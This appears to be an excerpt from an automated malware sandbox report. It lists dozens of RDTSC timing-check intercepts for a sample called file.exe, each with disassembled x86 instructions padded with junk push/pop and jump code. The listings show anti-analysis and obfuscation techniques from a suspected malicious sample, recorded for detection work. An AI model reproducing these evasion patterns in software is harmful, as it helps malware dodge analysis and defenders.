              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F700CE second address: 4F70109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 3BD8052Ch 0x0000000f pushad 0x00000010 push edx 0x00000011 mov ecx, 0A1E85AFh 0x00000016 pop eax 0x00000017 call 00007FBF315524C5h 0x0000001c pushad 0x0000001d popad 0x0000001e pop esi 0x0000001f popad 0x00000020 push 49964CECh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70109 second address: 4F7010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7010F second address: 4F70172 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF315524BCh 0x00000009 jmp 00007FBF315524C5h 0x0000000e popfd 0x0000000f jmp 00007FBF315524C0h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 add dword ptr [esp], 2C0EDE84h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ebx, 18037BB0h 0x00000026 call 00007FBF315524C9h 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70172 second address: 4F70178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70178 second address: 4F7017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7017C second address: 4F70197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF3154D24Bh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70197 second address: 4F701FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FBF315524BEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ah, bh 0x00000014 mov ebx, eax 0x00000016 popad 0x00000017 mov ecx, 0872DD0Bh 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007FBF315524BEh 0x00000023 sub esp, 18h 0x00000026 jmp 00007FBF315524C0h 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F701FA second address: 4F701FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F701FE second address: 4F7021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7021B second address: 4F70221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70221 second address: 4F70225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70225 second address: 4F702A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBF3154D256h 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FBF3154D250h 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 call 00007FBF3154D24Eh 0x0000001b pop ebx 0x0000001c pushfd 0x0000001d jmp 00007FBF3154D24Eh 0x00000022 adc eax, 5EBCA498h 0x00000028 jmp 00007FBF3154D24Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ah, 9Ch 0x00000035 jmp 00007FBF3154D257h 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F702A6 second address: 4F702AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F702AC second address: 4F702B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F702B0 second address: 4F702E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FBF315524C7h 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF315524C5h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F702E8 second address: 4F702EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F702EE second address: 4F70311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, 6A1F6E18h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70311 second address: 4F70318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70318 second address: 4F7035A instructions: 0x00000000 rdtsc 0x00000002 call 00007FBF315524C8h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FBF315524BAh 0x00000015 and cx, 4FA8h 0x0000001a jmp 00007FBF315524BBh 0x0000001f popfd 0x00000020 mov di, si 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7035A second address: 4F70360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70360 second address: 4F70364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70364 second address: 4F70398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D257h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [75AB4538h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FBF3154D24Bh 0x00000018 pop eax 0x00000019 mov dh, 7Ch 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70398 second address: 4F703AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF315524BEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F703AA second address: 4F703AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F703AE second address: 4F703D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007FBF315524C7h 0x00000010 xor eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F703D8 second address: 4F703DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F703DC second address: 4F703E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F703E2 second address: 4F70400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D253h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70400 second address: 4F70404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70404 second address: 4F7040A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7040A second address: 4F7040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7040F second address: 4F704AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FBF3154D256h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 mov ecx, edx 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 jmp 00007FBF3154D24Bh 0x0000001c jmp 00007FBF3154D258h 0x00000021 popad 0x00000022 lea eax, dword ptr [ebp-10h] 0x00000025 pushad 0x00000026 pushad 0x00000027 mov ax, 1C63h 0x0000002b jmp 00007FBF3154D258h 0x00000030 popad 0x00000031 push ecx 0x00000032 call 00007FBF3154D251h 0x00000037 pop esi 0x00000038 pop ebx 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FBF3154D253h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F704AD second address: 4F704B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F704B3 second address: 4F704DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-18h], esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF3154D255h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F704DE second address: 4F70585 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f jmp 00007FBF315524BEh 0x00000014 mov ecx, dword ptr [eax+00000FDCh] 0x0000001a pushad 0x0000001b call 00007FBF315524BEh 0x00000020 jmp 00007FBF315524C2h 0x00000025 pop eax 0x00000026 pushfd 0x00000027 jmp 00007FBF315524BBh 0x0000002c jmp 00007FBF315524C3h 0x00000031 popfd 0x00000032 popad 0x00000033 test ecx, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FBF315524BBh 0x0000003e add esi, 51B58ACEh 0x00000044 jmp 00007FBF315524C9h 0x00000049 popfd 0x0000004a movzx esi, di 0x0000004d popad 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70585 second address: 4F7058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7058B second address: 4F705C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FBF315524FEh 0x0000000e jmp 00007FBF315524C0h 0x00000013 add eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBF315524C7h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F705C4 second address: 4F70600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D259h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF3154D258h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70600 second address: 4F70604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70604 second address: 4F7060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7060A second address: 4F70610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70610 second address: 4F70614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70614 second address: 4F7062B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF315524BBh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60046 second address: 4F600BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3154D257h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov ebx, 0A9A88E6h 0x00000014 pushfd 0x00000015 jmp 00007FBF3154D257h 0x0000001a adc eax, 52F3636Eh 0x00000020 jmp 00007FBF3154D259h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 jmp 00007FBF3154D24Eh 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F600BA second address: 4F600E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 mov cx, bx 0x0000000b popad 0x0000000c sub esp, 2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBF315524C3h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F600E0 second address: 4F600E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F600E6 second address: 4F60117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D751h 0x00000007 pushfd 0x00000008 jmp 00007FBF315524BEh 0x0000000d and ax, 6BA8h 0x00000012 jmp 00007FBF315524BBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60117 second address: 4F6011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6011D second address: 4F60122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60122 second address: 4F60157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBF3154D24Bh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FBF3154D256h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bl, 74h 0x0000001b mov cl, 59h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60157 second address: 4F6015D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6015D second address: 4F60161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60161 second address: 4F60165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60165 second address: 4F60174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60174 second address: 4F60178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60178 second address: 4F6018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6018A second address: 4F60190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60190 second address: 4F60194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60203 second address: 4F6020E instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6020E second address: 4F60212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60212 second address: 4F60287 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBF315524C0h 0x00000008 xor eax, 071F0778h 0x0000000e jmp 00007FBF315524BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 inc ebx 0x00000018 jmp 00007FBF315524C6h 0x0000001d test al, al 0x0000001f pushad 0x00000020 mov ax, E76Dh 0x00000024 mov dx, si 0x00000027 popad 0x00000028 je 00007FBF31552665h 0x0000002e jmp 00007FBF315524C4h 0x00000033 lea ecx, dword ptr [ebp-14h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FBF315524BAh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60287 second address: 4F6028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6028B second address: 4F60291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60291 second address: 4F602AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F602AC second address: 4F602B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F602B0 second address: 4F602B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60318 second address: 4F6033F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF315524C5h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60373 second address: 4F603BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBF3154D251h 0x00000008 pop ecx 0x00000009 mov ecx, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 jmp 00007FBF3154D253h 0x00000015 jg 00007FBFA204B330h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBF3154D255h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F603BF second address: 4F6047A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FBF315524EDh 0x0000000f jmp 00007FBF315524BEh 0x00000014 cmp dword ptr [ebp-14h], edi 0x00000017 jmp 00007FBF315524C0h 0x0000001c jne 00007FBFA2050556h 0x00000022 jmp 00007FBF315524C0h 0x00000027 mov ebx, dword ptr [ebp+08h] 0x0000002a pushad 0x0000002b mov si, AF7Dh 0x0000002f mov ecx, 0AADC679h 0x00000034 popad 0x00000035 lea eax, dword ptr [ebp-2Ch] 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FBF315524C2h 0x0000003f jmp 00007FBF315524C5h 0x00000044 popfd 0x00000045 call 00007FBF315524C0h 0x0000004a movzx ecx, bx 0x0000004d pop edi 0x0000004e popad 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FBF315524C4h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6047A second address: 4F60489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60489 second address: 4F604AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, FBEAh 0x00000007 mov edx, 128BECB6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF315524C3h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F604AE second address: 4F604B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F604B4 second address: 4F604B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F604B8 second address: 4F60548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D24Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007FBF3154D254h 0x00000012 call 00007FBF3154D252h 0x00000017 pop eax 0x00000018 pop edi 0x00000019 pushfd 0x0000001a jmp 00007FBF3154D250h 0x0000001f xor eax, 44680C98h 0x00000025 jmp 00007FBF3154D24Bh 0x0000002a popfd 0x0000002b popad 0x0000002c nop 0x0000002d pushad 0x0000002e call 00007FBF3154D254h 0x00000033 jmp 00007FBF3154D252h 0x00000038 pop esi 0x00000039 popad 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60548 second address: 4F60561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60561 second address: 4F60586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3154D251h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF3154D24Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60586 second address: 4F6058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6058C second address: 4F60590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60590 second address: 4F60594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F60594 second address: 4F605AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF3154D24Eh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F605AF second address: 4F605BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF315524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
